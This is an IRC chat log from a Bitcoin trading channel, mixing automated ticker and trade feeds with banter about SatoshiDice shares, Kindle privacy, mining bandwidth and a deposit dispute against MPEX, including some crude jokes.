[+] Jan 17 15:27:01 [MPEX] [S.MPOE] 75000 @ 0.0006725 = 50.4375 BTC [+] Jan 17 15:27:01 [MPEX] [S.MPOE] 8674 @ 0.00067289 = 5.8366 BTC [+] Jan 17 15:27:01 [MPEX] [S.MPOE] 18071 @ 0.00067375 = 12.1753 BTC [+] Jan 17 15:39:16 !ticker m s.dice Jan 17 15:39:18 [MPEX:S.DICE] 1D: 0.00473687 / 0.00503935 / 0.00598999 (145350 shares, 732.47 BTC), 7D: 0.00449034 / 0.00471101 / 0.00598999 (2616031 shares, 12,324.15 BTC), 30D: 0.0014 / 0.00372409 / 0.00598999 (11740066 shares, 43,721.16 BTC) Jan 17 15:39:22 Whales have returned Jan 17 15:39:42 http://satoshidice.com/lookup.php?tx=&limit=1000&min_bet=10&status=ALL Jan 17 15:41:08 WIN 1000.67350000 Jan 17 15:41:11 on less thn 16k Jan 17 15:41:25 800.03870000 less than 8 wow Jan 17 15:42:44 In other news Jan 17 15:42:44 US jobless aid applications fall to 5-year low Jan 17 15:43:01 SP500 is gonna blow thru the 5 year high today Jan 17 15:43:13 that's pretty bad news innit. Jan 17 15:43:57 no, unemployment Jan 17 15:44:03 apps down to 5 year low Jan 17 15:44:06 335k Jan 17 15:44:21 yes but that just means chronical unemployment is becoming unamangeable Jan 17 15:44:29 these aren't people who found jobs. Jan 17 15:44:38 heh Jan 17 15:44:39 well Jan 17 15:44:50 There is roll off issues Jan 17 15:45:00 there is something else ? Jan 17 15:45:20 hiring Jan 17 15:45:35 i have my doubts about that. Jan 17 15:45:46 other than govt and high skilled tech jobs there's no hiring. Jan 17 15:46:03 govt is a pointless expense and high skilled techs have no business playing the employee anwyay Jan 17 15:46:24 [MPEX] [S.BBET] 201 @ 0.00150005 = 0.3015 BTC [-] Jan 17 15:47:22 The C140Ts are the ugly duckling of the MPOE Jan 17 15:47:28 y u no buy? Jan 17 15:52:43 [MPEX] [S.MPOE] 7100 @ 0.0006647 = 4.7194 BTC [-] Jan 17 15:54:26 kinda weird how that works Jan 17 15:54:37 peak volume at 11/12 Jan 17 15:54:40 yeah Jan 17 15:54:42 like Jan 17 15:54:53 you'd expect it to be centered atm Jan 17 15:54:56 not 2 under Jan 17 15:54:57 arent the strike price options the highes leverage usually? Jan 17 15:55:03 yeah Jan 17 15:55:08 I dunno how the spread effects that Jan 17 15:55:11 affect Jan 17 15:55:18 i wonder if i have a pricing issue Jan 17 15:55:41 more likely people are non-rational Jan 17 15:55:44 buyers Jan 17 15:55:47 then again... maybe person isn't into leverage Jan 17 15:55:54 but some sort of particular hedging ? Jan 17 15:57:11 heyo! Jan 17 15:57:13 ;;ticker Jan 17 15:57:14 attention ladies making millions in btc : http://polimedia.us/dtng/c/src/135842974497.jpg Jan 17 15:57:14 BTCUSD ticker | Best bid: 14.95895, Best ask: 14.96000, Bid-ask spread: 0.00105, Last trade: 14.95895, 24 hour volume: 45073.86760974, 24 hour low: 14.45000, 24 hour high: 14.97000, 24 hour vwap: 14.72695 Jan 17 15:57:20 always wear panties when helicoptering. Jan 17 16:02:21 [MPEX] [S.DICE] 1000 @ 0.00565991 = 5.6599 BTC [-] Jan 17 16:02:22 [MPEX] [S.DICE] 2274 @ 0.00565992 = 12.8707 BTC [+] Jan 17 16:11:33 i don't know what's going on with this dice price Jan 17 16:11:54 !ticker m S.MPOE Jan 17 16:11:55 [MPEX:S.MPOE] 1D: 0.00064635 / 0.00066278 / 0.00067375 (780682 shares, 517.43 BTC), 7D: 0.00062769 / 0.00065893 / 0.00067375 (6816444 shares, 4,491.59 BTC), 30D: 0.00058738 / 0.00063911 / 0.00067375 (39841651 shares, 25,463.37 BTC) Jan 17 16:12:09 supply and demand dude Jan 17 16:12:15 also whale betting has resumed Jan 17 16:12:32 ok i don't know is going on with the demand for this dice Jan 17 16:12:44 welcome to the clu Jan 17 16:12:46 b Jan 17 16:12:55 What if the world economy had 1 company that made money Jan 17 16:12:58 big money Jan 17 16:13:00 o btw pigeons , 1st rota case. Jan 17 16:15:20 oh? Jan 17 16:17:03 http://trilema.com/2013/case-i-wences-vs-mpex-breach-of-fiduciary-duty/ Jan 17 16:17:15 [MPEX] [S.MPOE] 14000 @ 0.0006647 = 9.3058 BTC [-] Jan 17 16:17:17 [MPEX] [S.MPOE] 10450 @ 0.00067375 = 7.0407 BTC [+] Jan 17 16:21:01 OK then. Jan 17 16:27:50 mircea_popescu: did you mess up a deposit? Jan 17 16:30:59 the op ddi. Jan 17 16:33:03 https://bitcoincaptcha.com/ Jan 17 16:34:19 is it "pay some satoshi here to display page" ? Jan 17 16:39:45 yes Jan 17 16:40:00 dusplays a qr code for that Jan 17 16:40:20 btw Jan 17 16:40:24 anyone uses these codes oftenly? Jan 17 16:40:27 also released a WP plugin so download this content via bitcoincapcha Jan 17 16:40:31 no Jan 17 16:40:34 seems like a dead tech mostly Jan 17 16:40:40 one day someone will think of a use haha Jan 17 16:40:45 :D Jan 17 16:41:15 kakobrekla you mean qr codes ? Jan 17 16:41:22 xs Jan 17 16:41:24 ya Jan 17 16:41:27 yeah. Jan 17 16:41:40 i know there's people who use them to pass mpex stuff from cold to hot machine Jan 17 16:42:01 we are excluding thoese two people from the study Jan 17 16:42:11 like a dozen you hater you Jan 17 16:42:17 :D:D Jan 17 16:42:41 and i also plan to trampstamp my hos with qr codes Jan 17 16:42:47 so i can more effectually keep track Jan 17 16:42:50 lol Jan 17 16:43:03 they are valid until pussy smells Jan 17 16:43:36 ;/ Jan 17 16:43:41 ruined my appetite. Jan 17 16:43:53 aw sorry Jan 17 16:44:12 kakobrekla: how's your EA going? Jan 17 16:44:27 pizzaman1337 i code and i code and i code Jan 17 16:44:39 kakobrekla: do you profit and profit and profit too? Jan 17 16:44:43 :D Jan 17 16:44:49 yeah Jan 17 16:44:51 well Jan 17 16:44:59 i have some interesting stuff that im testing now Jan 17 16:45:48 wasnt souch a good month so far Jan 17 16:45:53 a bunch of bad entry points Jan 17 16:46:00 i fix. Jan 17 16:46:03 ;) Jan 17 16:46:16 cool Jan 17 16:46:40 im trying to use critticall now Jan 17 16:46:45 I'll be back to bit4x in a month or two probably, busy at the moment with other stuff Jan 17 16:46:46 here, plug bitcoin into this http://www.kk.org/thetechnium/archives/2013/01/ill_pay_you_to.php Jan 17 16:46:57 http://critticall.com/ Jan 17 16:47:33 interesting Jan 17 16:47:51 accually i know the person who made it :) Jan 17 16:49:22 Amazon Kindles today already track bookmark usage patterns which they relay back to Amazon on via its wireless Whispernet. Jan 17 16:49:24 fuck that shit Jan 17 16:49:44 mircea_popescu: erm? its just cloud sync Jan 17 16:49:54 dude reading is private Jan 17 16:50:01 i don't want some idiots counting my page turns. Jan 17 16:50:05 then... dont use kindles? Jan 17 16:50:08 i don't. Jan 17 16:50:10 dude Jan 17 16:50:15 I can pick up a kindle Jan 17 16:50:15 read Jan 17 16:50:18 turn it off Jan 17 16:50:27 then load up it on a different device Jan 17 16:50:32 and continue reading where I left off Jan 17 16:50:37 [MPEX] [S.MPOE] 3000 @ 0.00067374 = 2.0212 BTC [-] Jan 17 16:50:44 so ? Jan 17 16:50:56 thats what syncing is. Jan 17 16:51:03 its where multiple devices share the same state Jan 17 16:51:05 [MPEX] [S.MPOE] 7679 @ 0.00067375 = 5.1737 BTC [+] Jan 17 16:51:28 then we're talking of diff things. Jan 17 16:51:30 [MPEX] [S.MPOE] 19089 @ 0.00067389 = 12.8639 BTC [+] Jan 17 16:52:01 EskimoBob: amazon has yet to enforce it on anyone Jan 17 16:52:05 [MPEX] [S.MPOE] 8900 @ 0.00067439 = 6.0021 BTC [+] Jan 17 16:52:06 they cant seem to make a working DRM Jan 17 16:52:24 I dont think they want to Jan 17 16:52:25 its not hard Jan 17 16:54:51 i think the funny thing is one of the first books amazon literally took back after publisher isses even after folks had paid for it was "1984" Jan 17 16:55:37 lol Jan 17 16:55:55 also bullshit. what the fuck "take back" Jan 17 16:56:07 this crap needs to die. apple, amazon, the whole shebang. Jan 17 16:56:20 electronic devices where the buyer isn't the root user should be illegal. Jan 17 16:57:00 making them illegal will pretty much be mpex's largest lobby effort in the future, im pretty sure. Jan 17 16:57:12 funnier that that is i've literally often encountered people who actually think apple is like a humanitarian organization Jan 17 16:57:35 ya, sure, in the sense the dutch slave transporters were humanitarians Jan 17 16:57:39 oh shit mpex gonna get political, sell sell Jan 17 16:57:57 i never heard of a company that size which managed to avoid getting political. Jan 17 16:58:36 bfl is bigger and they ain't political Jan 17 16:58:38 [09:54:49] i think the funny thing is one of the first books amazon literally took back after publisher isses even after folks had paid for it was "1984" Jan 17 16:58:43 they also said thats not happening again Jan 17 16:58:59 pigeons give them a little lol Jan 17 16:59:02 they amended the licensing agreement with all the publishers that if they have to do that: too fucking bad Jan 17 16:59:21 praise bezos Jan 17 16:59:23 the reason 1984 was recalled was because the publisher apparently didnt have the rights to publish it as an ebook Jan 17 16:59:32 and amazon ended up replacing it anyhow Jan 17 16:59:43 no! rabble! RABBLE! Jan 17 16:59:47 still funny Jan 17 16:59:58 the problem was people lost any bookmarks and notes on the title Jan 17 17:00:09 due to how amazon stores data in the kindle software Jan 17 17:00:38 I mean, at least Amazon fixed it and put it place that it cant happen again Jan 17 17:00:49 thanks amazon-pr Jan 17 17:01:39 [MPEX] [S.MPOE] 8850 @ 0.00067615 = 5.9839 BTC [+] Jan 17 17:01:57 pigeons: is it still pr if they actually fix it? Jan 17 17:02:06 [MPEX] [S.MPOE] 100 @ 0.00067827 = 0.0678 BTC [+] Jan 17 17:02:07 yes Jan 17 17:03:07 Diablo-D3 quoth mpoe-pr : "pr is being right. packaging is secondary." Jan 17 17:03:21 or i'll kick you in the GoMaD_s Jan 17 17:03:31 i guess she'd have been taken out and shot if she worked for anyone else Jan 17 17:05:20 Korbman: keep buying those S.DICE Jan 17 17:05:42 I'd love to. Anybody want to give me money? Jan 17 17:06:16 apparantly Jan 17 17:06:33 pigeon pass through only 4%, pm Jan 17 17:07:18 ill pass you through PPT (no association with pirate) for 4.20% only Jan 17 17:09:06 what's with all the .net, .split quits? Jan 17 17:09:21 I'm not familiar with that one Jan 17 17:09:42 it's the way the IRC protocol/network works Jan 17 17:09:57 clients connect to servers. servers sometimes lose connections to each other Jan 17 17:10:07 clients on either side of this split see clients on the other side as netsplit. Jan 17 17:10:08 that server and the users connected aren't reachable termporarily Jan 17 17:10:59 so terryww you manually joined a different server? Korbman was asking about netsplits Jan 17 17:11:20 pigeons, what? Jan 17 17:11:32 they probably just reconnected Jan 17 17:11:36 pigeons you can pick the server if you want to, just bypass the dns Jan 17 17:11:38 (the servers) Jan 17 17:11:40 Got it Jan 17 17:11:59 Googling helped as well of course Jan 17 17:12:14 yeah, i was demoing for Korbman how most will rejoin when the server sees the other servers, but terry was different Jan 17 17:12:41 yup, topace is back Jan 17 17:12:55 I imagine the other two will pop back soon as well Jan 17 17:13:31 what happened here was that their server died, and this was reported first to the irc network and then to the clients linked to it. Jan 17 17:13:40 they just saw their connection die and reloaded, ending up back on Jan 17 17:13:51 indeed Jan 17 17:14:37 someone that understands mining care to comment on Jan 17 17:14:39 "Unless I misunderstand something, having 1gb blocks would pose significant problems for pretty much all miners, and would not be necessarily trivial to handle on asics designed with 1mb/block assumptions in mind." Jan 17 17:14:42 ? Jan 17 17:17:08 would need to check what comes out the GBH or whatever is called protocol Jan 17 17:22:09 im back yes? Jan 17 17:22:11 GBH? I only know GHB, it's an easy entry synthesis, kinda babby's first home-made drug Jan 17 17:22:18 grr Jan 17 17:23:19 a sry Jan 17 17:23:21 what was that a netsplit? Jan 17 17:23:21 its GBT Jan 17 17:23:39 https://en.bitcoin.it/wiki/Getblocktemplate Jan 17 17:23:45 getblocktemplate Jan 17 17:24:08 https://bitcointalk.org/index.php?topic=131035.0 Jan 17 17:24:14 the problem is downloading this this Jan 17 17:24:17 nothing else really Jan 17 17:24:21 that's a good comparison i thought. bw is an important limiting factor for miners. Jan 17 17:24:22 this this = this shit Jan 17 17:24:28 yeah Jan 17 17:35:07 [HAVELOCK] [SDICE] 3 @ 0.5 = 1.5 BTC [+] Jan 17 17:36:46 with stratum bandwidth isnt an issue Jan 17 17:37:01 i have 25GH running and it uses less than a 28.8 modem Jan 17 17:37:22 heh, I should add stratum to diablominer Jan 17 17:37:24 but meh =/ Jan 17 17:40:15 topace_ on 1mb capped blocks. Jan 17 17:40:25 if they were 1gb that'd be more than a t1 ? Jan 17 17:41:25 [BTCTC] [GOLD] 1 @ 1.1893 BTC [-] Jan 17 17:41:30 T1 is slow as shit, so probably Jan 17 17:41:39 T1 is 1.544mbps Jan 17 17:41:50 my DSL is approximately two those. Jan 17 17:42:13 Indeed Jan 17 17:42:22 you know, when I was a kid Jan 17 17:42:24 I wanted a T1 Jan 17 17:42:36 because all we had was dialup, and we didnt even have 56k yet Jan 17 17:43:21 I started with 2400, then had 14.4, then had 33.6, then 56k for awhile Jan 17 17:43:31 topace_ now multiply that 1.5 mbps with 100 because 2.5th won't be too rare by the time blocks are 1gb Jan 17 17:43:51 and then I had 768k dsl and now 3mbps Jan 17 17:44:05 and soon as fairpoint gets done raping verizon's dead corpse, Ill get 15 Jan 17 17:44:33 when I was a kid I was happy to have 28.8 ..then we moved up to 56 and damn it was "fast" Jan 17 17:44:43 man, 56k was lol Jan 17 17:44:51 2 days to download an episode of anime Jan 17 17:44:52 and it wasnt even good quality Jan 17 17:44:53 and then I went straight from that to 1mbps cable and shit my pants Jan 17 17:45:20 [BTCTC] [BTC-TRADING-PT] 10 @ 0.1435 = 1.435 BTC [-] Jan 17 17:45:20 now I'm on 25mbps and I think it's too slow sometimes :P Jan 17 17:45:39 Google Fiber please! Jan 17 17:45:48 haha Jan 17 17:46:01 well, all I want is netflix in hd Jan 17 17:46:20 you should all move to romania Jan 17 17:46:27 best internet outside of azn. Jan 17 17:47:41 i wikipedia stalked your country i think Jan 17 17:47:54 o? Jan 17 17:47:56 now i forget everything i learned Jan 17 17:50:23 lol Jan 17 17:50:33 mircea_popescu: i stole some code from work to help with the endeavor Jan 17 17:51:06 down with the banks! Jan 17 17:51:14 !ticker S.MPOE Jan 17 17:51:14 Provide exchange and ticker. Jan 17 17:51:19 !ticker m S.MPOE Jan 17 17:51:21 [MPEX:S.MPOE] 1D: 0.00064635 / 0.0006636 / 0.00067827 (852750 shares, 565.89 BTC), 7D: 0.00062769 / 0.00065914 / 0.00067827 (6872362 shares, 4,529.89 BTC), 30D: 0.00058998 / 0.00063929 / 0.00067827 (39819121 shares, 25,456.12 BTC) Jan 17 17:52:08 !ticker m O.BTCUSD.C140T Jan 17 17:52:11 [MPEX:O.BTCUSD.C140T] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 0.10808014 / 0.12130616 / 0.14775821 (15 shares, 1.82 BTC), 30D: 0.01359389 / 0.02685208 / 0.19999999 (1051 shares, 28.22 BTC) Jan 17 17:52:28 ;;ticker Jan 17 17:52:29 BTCUSD ticker | Best bid: 14.87203, Best ask: 14.98901, Bid-ask spread: 0.11698, Last trade: 14.87001, 24 hour volume: 47086.67851179, 24 hour low: 14.45900, 24 hour high: 14.99002, 24 hour vwap: 14.76172 Jan 17 17:52:44 shit did it touch 15 ? Jan 17 17:52:48 wow 14.99 Jan 17 17:52:54 about to Jan 17 17:53:02 :) Jan 17 17:53:50 no, the difficulty for stratum will just go up Jan 17 17:53:56 right now each block i submit to the pool is worth 16 shares Jan 17 17:54:17 with 2.5TH, each block i submit will be worth like, 64 shares Jan 17 17:54:20 or whatever Jan 17 17:54:31 it'll still try to submit x blocks every x minutes Jan 17 17:55:02 hm Jan 17 17:55:12 i dunno, you actually have to somehow get the data you're hashing Jan 17 17:55:37 i got rid of all my gear except for single moded ztex runing 260mhash, ill just put it on solo and check in 10 years Jan 17 17:56:02 [BTCTC] [BTC-TRADING-PT] 90 @ 0.1435 = 12.915 BTC [-] Jan 17 17:56:11 like playin a lottery i guess Jan 17 17:56:45 yea but the hash string is a short piece of text Jan 17 17:57:59 [MPEX] [S.DICE] 500 @ 0.00587899 = 2.9395 BTC [+] Jan 17 18:00:07 [HAVELOCK] [SDICE] 5 @ 0.509 = 2.545 BTC [+] Jan 17 18:01:49 So the reality is, even at a TH/s bandwidth shouldn't be an issue? Jan 17 18:02:42 right Jan 17 18:02:44 thats what stratum solves Jan 17 18:03:05 kakobrekla> i got rid of all my gear except for single moded ztex runing 260mhash, ill just put it on solo and check in 10 years << tbh, if i mined i'd solo too. Jan 17 18:03:28 that's what I presumed, but I wasn't sure the exact amount of data consumed per, say, 1GH/s Jan 17 18:05:01 bandwidth* consumed Jan 17 18:05:18 Korbman there are two factors here : hash speed and average block size. Jan 17 18:05:34 the ideea is that both will go up by degrees of magnitude (like, one or two every year) Jan 17 18:05:37 Right Jan 17 18:05:46 makes sense Jan 17 18:05:55 and the question is, are there asumptions baked in (or even burned into silicon) Jan 17 18:05:58 that this may conflict with Jan 17 18:06:38 i have no clue about mining, but i've managed projects before and i'm inclined to suspect that probably there are. Jan 17 18:08:47 i'm going to keep mining as long as the orphanage is paying my power bill Jan 17 18:09:26 mircea_popescu: the other, non bfl asic manufacturers have mentioned that their devices are agnostic to bitcoin mining, only for sha-256 hashing and i think even agnosting to the 2x256 thing and all that detail stuff being handled in host controller software Jan 17 18:12:06 [HAVELOCK] [SDICE] 5 @ 0.51 = 2.55 BTC [+] Jan 17 18:15:19 but if big blocks like that, bfl has to rewrite their tablet software! Jan 17 18:15:56 anyway, see, if they were a scam, why even write that in the first place! Jan 17 18:16:12 who is this Shavers guy BFL hired for marketing? Jan 17 18:16:59 lol Jan 17 18:21:06 [HAVELOCK] [SDICE] 50 @ 0.515 = 25.75 BTC [+] Jan 17 18:21:08 [HAVELOCK] [SDICE] 8 @ 0.52 = 4.16 BTC [+] Jan 17 18:21:09 [HAVELOCK] [SDICE] 5 @ 0.5275 = 2.6375 BTC [+] Jan 17 18:21:10 [HAVELOCK] [SDICE] 10 @ 0.52999999 = 5.3 BTC [+] Jan 17 18:21:12 [HAVELOCK] [SDICE] 1 @ 0.55 BTC [+] Jan 17 18:21:13 [HAVELOCK] [SDICE] 30 @ 0.55 = 16.5 BTC [+] Jan 17 18:21:14 [HAVELOCK] [SDICE] 8 @ 0.58 = 4.64 BTC [+] Jan 17 18:22:05 [HAVELOCK] [SDICE] 9 @ 0.58 = 5.22 BTC [+] Jan 17 18:22:35 [MPEX] [S.MPOE] 2000 @ 0.00067826 = 1.3565 BTC [-] Jan 17 18:22:42 [MPEX] [S.MPOE] 4550 @ 0.00067827 = 3.0861 BTC [+] Jan 17 18:23:09 damn...glad to see I'm still holding my shares of SDICE bought at .37 :P Jan 17 18:23:36 57% gain in 2 weeks Jan 17 18:23:51 :) Jan 17 18:25:04 !ticker h sdice Jan 17 18:25:05 [HAVELOCK:SDICE] 1D: 0.48000000 / 0.52973776 / 0.58000000 (143 shares, 75.75249990 BTC), 7D: 0.47500000 / 0.49032197 / 0.58000000 (719 shares, 352.54149990 BTC), 30D: 0.37000000 / 0.45605941 / 0.62000000 (3678 shares, 1677.38649988 BTC) Jan 17 18:26:39 we'll see what happens on next dividend Jan 17 18:26:54 i think a lot of people foolishly think that the crazy up luck month of december will continue Jan 17 18:27:23 yup Jan 17 18:29:24 got announcements from amir/genjix: Jan 17 18:29:25 I know how to format Sunday. Some of you will also know how to format Jan 17 18:29:27 Sunday night events. I think we should definitely do it that way. Jan 17 18:29:28 It's cold outside so we'll do it inside instead. Jan 17 18:29:58 like,wtf? Jan 17 18:31:49 ;;ticker Jan 17 18:31:50 BTCUSD ticker | Best bid: 14.90004, Best ask: 15.00000, Bid-ask spread: 0.09996, Last trade: 14.90004, 24 hour volume: 48207.48847395, 24 hour low: 14.45900, 24 hour high: 15.00000, 24 hour vwap: 14.77713 Jan 17 18:31:58 yay $15 Jan 17 18:41:40 We have good news we have had a new shipment come in yesterday and were able to ship it to you. Jan 17 18:41:42 YAY Jan 17 18:44:50 fifteen Jan 17 18:49:24 it hit ? Jan 17 18:49:34 over Jan 17 18:49:42 pigeons aha Jan 17 18:49:55 15.15 the kids are bidding Jan 17 18:50:14 i think a lot of people foolishly think that the crazy up luck month of december will continue << actually december wasn't much off ev was it ? Jan 17 18:50:38 jurov what's it mean to format sunday ? Jan 17 18:51:04 +Jan17 16:49:36 bitstamp 10.0000 @ 15.01 USD Jan 17 18:51:04 +Jan17 18:49:30 cbx 5.5012 @ 14.31 USD Jan 17 18:51:05 +Jan17 16:49:53 mtgox 0.2500 @ 15.15029 USD Jan 17 18:51:05 +Jan17 16:49:58 bitme 5.2000 @ 15.29 USD Jan 17 18:51:05 +Jan17 18:49:53 cbx 0.1366 @ 14.31 USD Jan 17 18:51:05 * i2pRelay (~i2prelay@gateway/tor-sasl/i2prelay) has joined #bitcoin-market Jan 17 18:51:07 +Jan17 16:50:22 btcn 1.0000 @ 91.98 CNY Jan 17 18:51:09 +Jan17 16:50:22 mtgox x23 24.6047 @ 15.16041205 USD Jan 17 18:51:11 sorry for spam Jan 17 18:51:15 mircea, dunno, perhaps some anarchist thing Jan 17 18:51:32 lol Jan 17 18:51:37 it's every exchange too not just gox Jan 17 18:51:47 that's fun to see Jan 17 18:52:11 well in other news i made myself chocolate Jan 17 18:52:29 haha Jan 17 18:58:57 damn mircea_popescu, who do you think will be chosen as judges Jan 17 18:59:12 [MPEX] [O.BTCUSD.C140T] 110 @ 0.1385 = 15.235 BTC [-] Jan 17 18:59:15 [MPEX] [O.BTCUSD.C140T] 510 @ 0.1409839 = 71.9018 BTC [+] Jan 17 18:59:53 smickles well i have no idea, seeing how neither party gave any input. random pick Jan 17 19:00:00 judges for what Jan 17 19:00:26 rota has to work? Jan 17 19:00:33 yup Jan 17 19:00:38 jcpham i hilited you like yest lol Jan 17 19:00:39 booo....free money Jan 17 19:01:10 i was at home yesterday Jan 17 19:01:17 that client is the suck Jan 17 19:01:34 http://trilema.com/2013/case-i-wences-vs-mpex-breach-of-fiduciary-duty/ Jan 17 19:01:46 so which entity? k Jan 17 19:02:59 so who is EF0641A7? Jan 17 19:03:26 yes where can ireadup on the particulars Jan 17 19:03:34 (the signer of the claim) Jan 17 19:03:38 also it looks like this dispute is against mpex et al. Jan 17 19:05:19 maybe i shouldn't start discussing details in case i'm chosen as a judge Jan 17 19:05:46 i think you are correct. no cross- talk Jan 17 19:05:56 but i would like any and al details to the particulars Jan 17 19:06:00 "for Jan 17 19:06:01 the sum of 130.04256216 mistakenly sent 130.00 BTC instead." Jan 17 19:06:06 is all i have deciphered thus far Jan 17 19:07:50 well, dude sent round value Jan 17 19:07:54 you can see it in the blockchain Jan 17 19:07:58 now wants to claim it. Jan 17 19:08:21 so it's a ssimple as someone not follwing the rules Jan 17 19:08:33 i assume mpex to be automated Jan 17 19:08:50 why do you assume that ?! Jan 17 19:08:59 did he at least send the additional 0.04256216? Jan 17 19:09:09 if it was mine it would be automated Jan 17 19:09:32 i would, and then i'd argue it was nowhere sait it must be sent at once :P Jan 17 19:09:35 jcpham: deposits arn't automated Jan 17 19:09:37 jurov that's a different transaction Jan 17 19:09:40 happens to also be 130 btc Jan 17 19:09:40 *fully Jan 17 19:10:01 and yes it's said it has to be sent at once lol Jan 17 19:10:22 well, I can't wait to see the argments presented Jan 17 19:10:31 iirc the mpex faq had some such statement about incorrect amounts Jan 17 19:10:45 and I wonder if i'll be chosen as a judge or not Jan 17 19:10:45 lol, there's a nice public note on blockchain.info.. did not knew this is possible Jan 17 19:10:48 very interesting Jan 17 19:10:58 jurov whassat ? Jan 17 19:11:11 go to http://blockchain.info/address/1Fx3N5iFPDQxUKhhmDJqCMmi3U8Y7gSncx Jan 17 19:11:14 scroll down Jan 17 19:11:17 [MPEX] [S.DICE] 25 @ 0.00594222 = 0.1486 BTC [+] Jan 17 19:11:31 or grep "Public Note:" Jan 17 19:12:08 da fuck !? Jan 17 19:12:19 mmmmhmmm Jan 17 19:12:19 is that the result of him signing the message ? Jan 17 19:12:41 i think it's stuff you can put in the tx Jan 17 19:12:46 i am actually unsure Jan 17 19:12:58 me too. Jan 17 19:13:05 no you can't put stuff like this into tx Jan 17 19:13:10 use bitcoind help sendtoaddress Jan 17 19:13:10 this will be an interesting case i think Jan 17 19:13:13 he mush have associated it some other way Jan 17 19:13:19 jurov iirc you can put it via blockchain Jan 17 19:13:24 they add a little tag and keep a db Jan 17 19:13:25 i'm thinking blockchain wallet Jan 17 19:13:27 tho i wouldn't sear to this Jan 17 19:13:44 1there are coinbase fields for [comment] and [comment-to] Jan 17 19:14:03 if it was in the tranasaction then the transaction isn't amistake Jan 17 19:14:12 so that idea negates the claim Jan 17 19:14:29 that's a point... Jan 17 19:15:53 https://bitcointalk.org/index.php?topic=40264.msg1158100#msg1158100 Jan 17 19:16:00 re blockchain notes Jan 17 19:17:41 If bitcointalk wasn't such a toxic waste dump I'd suggest someone curate this information ina thread Jan 17 19:17:52 i'm fine i have my own notes Jan 17 19:17:57 jcpham do it on my forum Jan 17 19:18:07 and where is that Jan 17 19:18:23 and they use OP_DROP to put the message in Jan 17 19:18:42 http://polimedia.us/btcf/ Jan 17 19:18:51 oh lol, i forgot about that Jan 17 19:18:55 smickles so basically, it's not a signature or anything ? Jan 17 19:18:59 smickles i forgot about it too lol. Jan 17 19:19:19 mircea_popescu: if it's in the tx, it is signed by the sender Jan 17 19:19:46 it's one of the 'scripts' Jan 17 19:19:48 problem is, the addies that signed are not the addies that sent the 130 Jan 17 19:19:58 so this isn't actually proof is it Jan 17 19:20:42 what are you saying it's not proof of? it looks like a message they put up when decided to sue mpex Jan 17 19:21:28 i assume the message was added after the fact and blochain.info allows something special Jan 17 19:21:37 smickles it's not proof that the same person actually sent the 130 Jan 17 19:21:42 it appears that way from the information i am reading Jan 17 19:21:47 understand, anyone watching mpex addy can claim any rounded sums Jan 17 19:21:50 as far as i know. Jan 17 19:22:02 so now there is the issue of ownership Jan 17 19:22:17 how does one prove ownership Jan 17 19:22:43 either sign with the addy or show the deposit slip issued by mpex. Jan 17 19:22:45 we know who or where the current owner is, but can the previous owner prove ownership Jan 17 19:22:46 i would guess Jan 17 19:23:06 or anything else the judges come up with Jan 17 19:23:09 that's why they're there Jan 17 19:24:53 i don't think the message could be added after the fact, it's in the tx afaik, however, the tx with the message was made on this past 17th, and isn't the 130 btc in question Jan 17 19:25:04 so what are you guys on about? Jan 17 19:25:12 15.30 Jan 17 19:25:15 on Gox Jan 17 19:25:18 =) Jan 17 19:25:50 no wai Jan 17 19:25:52 heh this is gonna crash hard Jan 17 19:25:57 ;;ticker Jan 17 19:25:57 BTCUSD ticker | Best bid: 15.29900, Best ask: 15.29980, Bid-ask spread: 0.00080, Last trade: 15.29900, 24 hour volume: 51318.02221687, 24 hour low: 14.45900, 24 hour high: 15.29990, 24 hour vwap: 14.82395 Jan 17 19:26:06 it's derping crazy Jan 17 19:26:26 the price, that ios Jan 17 19:26:27 [MPEX] [S.DICE] 548 @ 0.00594222 = 3.2563 BTC [+] Jan 17 19:27:04 people freaking out about the state of the world and going to bitcoin would be interesting Jan 17 19:27:34 jcpham: did you see what i declared as my company's themesong? Jan 17 19:27:44 i never listened to it Jan 17 19:28:11 ah well, i suppose it's not really important Jan 17 19:28:19 whoa Jan 17 19:28:22 i saw the link but got busy Jan 17 19:31:54 15.32 Jan 17 19:31:55 smickles. the message was certainly NOT in the tx. it looks like was just slapped on some other unrelated tx using blockchain.info Jan 17 19:31:56 heh Jan 17 19:33:03 the plaintiff will need to prove ownership. i don't see where that has been performed yet. Jan 17 19:33:07 maybe i've missed something Jan 17 19:33:10 jurov: that's what i'm saying, the message is on an unrelated tx Jan 17 19:33:27 from the same address for a token amount Jan 17 19:33:35 http://polimedia.us/btcf/viewtopic.php?f=9&t=17 Jan 17 19:33:43 canada's next Jan 17 19:33:47 however this doesn't prove an identity or ownership Jan 17 19:33:49 OK, being "in" and "on" is quite a difference :) Jan 17 19:35:18 hae you people seen the amazingrando scam accusation? How big was his mining op? Jan 17 19:35:52 jurov: well, i wasn't making the distinction there, maybe out of my own ignorrance, but i saw a statement by piuk that those blockchian messags are in txns via OP_DROP Jan 17 19:35:56 [BTCTC] [ESECURITYSABTC] 1 @ 0.8001 BTC [-] Jan 17 19:35:58 [BTCTC] [ESECURITYSABTC] 1 @ 0.8 BTC [-] Jan 17 19:38:26 http://trilema.com/2013/case-i-wences-vs-mpex-breach-of-fiduciary-duty/ Jan 17 19:38:30 pigeons ^^ you're on. Jan 17 19:39:24 oh my, progress Jan 17 19:41:45 on polimedia.us/btcf is registration disabled or i'm blind? Jan 17 19:43:58 jurov lemme check Jan 17 19:44:26 umm i guess it is Jan 17 19:47:20 Tritonio it was relatively large Jan 17 19:47:21 in just got idea... saw some people advertising their forum, can't remember Jan 17 19:47:28 i did not see the accusation tho. link ? Jan 17 19:47:37 i'd like to have some support topic for coinbr Jan 17 19:47:58 where i could be admin ... i don't want btctalk Jan 17 19:48:15 jurov forum was more a joke thing. it was never open registration, so it wouldn't make too good a support venue Jan 17 19:48:22 and don't want to install/maintain more stuff on the vps just for that Jan 17 19:48:44 mircea yes, but there were some other ppl that looked serious :) Jan 17 19:49:08 o ty :D Jan 17 19:50:46 looks it was this one: http://www.bitcoinforum.com Jan 17 19:55:46 jurov: yeah, you could only get membership on that forum if you had significant -otc trust with mircea, or even better L2 trust to mircea Jan 17 19:55:48 [MPEX] [S.DICE] 82 @ 0.00594222 = 0.4873 BTC [+] Jan 17 19:55:49 [MPEX] [S.DICE] 918 @ 0.00595019 = 5.4623 BTC [+] Jan 17 19:55:50 or something like that Jan 17 19:56:10 ;;gettrust mircea_popescu Jan 17 19:56:10 Trust relationship from user jurov to user mircea_popescu: Level 1: 4, Level 2: 2 via 2 connections. Graph: 